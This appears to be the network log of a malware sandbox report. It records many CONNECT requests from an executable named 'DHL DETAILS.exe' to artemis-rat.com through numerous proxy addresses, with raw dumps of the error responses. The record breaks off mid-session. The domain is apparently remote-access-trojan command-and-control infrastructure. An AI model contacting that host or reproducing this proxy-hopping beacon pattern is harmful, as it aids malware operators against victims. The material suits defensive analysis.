                                                                                    Mar 9, 2024 13:14:15.500916958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.536457062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.630309105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.630415916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    829192.168.2.552793104.20.75.132806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.508618116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.663219929 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    830192.168.2.552781159.65.77.16885856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.510991096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    831192.168.2.552734129.213.150.205806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.513973951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    832192.168.2.552606121.128.194.154806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.516586065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    833192.168.2.55259684.39.112.14431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.517543077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    834192.168.2.55168951.161.99.114482356352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.523636103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.536533117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.630280972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    835192.168.2.55268670.166.167.38577286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.527796030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    836192.168.2.54995162.171.131.101374476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.531694889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.552400112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    837192.168.2.552389112.30.155.83127926352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.532020092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.027978897 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    838192.168.2.55161947.106.112.20780816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.535219908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.888032913 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    839192.168.2.55262043.131.242.162156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.536516905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    840192.168.2.5526548.218.231.62156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.542236090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    841192.168.2.552641150.109.243.156156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.545541048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    842192.168.2.552628210.72.11.4631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.548026085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.649162054 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    843192.168.2.552589202.162.219.1010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.560049057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    844192.168.2.55261945.11.95.16560356352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.561954021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.380161047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.567790031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.677182913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.880143881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    845192.168.2.550127162.241.46.40494016352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.563277960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.723829031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833575964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.833089113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    846192.168.2.5526338.219.228.100156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.564775944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    847192.168.2.55268491.189.177.19031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.573398113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.898113012 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/5.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3628
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from lb1
                                                                                    X-Cache-Lookup: NONE from lb1:3128
                                                                                    Via: 1.1 lb1 (squid/5.7)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    848192.168.2.549992117.30.118.20081186352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.575233936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.676846981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.736804008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.864520073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    849192.168.2.552682185.49.31.20780816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.578811884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    850192.168.2.55279544.190.9.65481006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.580292940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    851192.168.2.55258894.20.183.172806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.582104921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    852192.168.2.552586212.108.155.20590906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.583364964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    853192.168.2.552702185.225.232.191806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.588509083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.899264097 CET805INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: Apache/2.4.57 (Debian)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
